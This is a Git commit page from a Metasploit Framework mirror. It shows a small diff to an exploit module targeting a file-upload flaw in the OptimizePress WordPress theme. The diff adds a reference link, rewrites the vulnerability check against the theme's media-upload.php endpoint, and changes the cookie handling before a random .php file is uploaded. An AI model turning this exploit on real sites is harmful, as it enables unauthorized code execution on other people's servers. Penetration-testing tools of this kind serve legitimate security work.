infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Updated

bug/bundler_fix
Mekanismen 2013-12-01 09:06:41 +01:00
parent 045b848a30
commit 57b7d89f4d
1 changed files with 5 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
modules/exploits/unix/webapp/php_wordpress_optimizepress.rb
View File

@ -21,6 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>
[ [
[ 'URL', "http://www.osirt.com/2013/11/wordpress-optimizepress-hack-file-upload-vulnerability/" ]
], ],
'Privileged' => false, 'Privileged' => false,
'Platform' => ['php'], 'Platform' => ['php'],
@ -42,10 +43,10 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => normalize_uri(uri, '/wp-content/themes/OptimizePress/lib/admin/media-upload.php') 'uri' => normalize_uri(uri, '/wp-content/themes/OptimizePress/lib/admin/media-upload.php')
}) })
if res and res.code == 200 if not res or res.code != 200
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe return Exploit::CheckCode::Safe
elsif res and res.code == 200
return Exploit::CheckCode::Vulnerable
end end
end end
@ -71,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
end end
#set cookie #set cookie
cookie = res.headers['Set-Cookie'] cookie = res.get_cookies
filename = rand_text_alphanumeric(8) + ".php" filename = rand_text_alphanumeric(8) + ".php"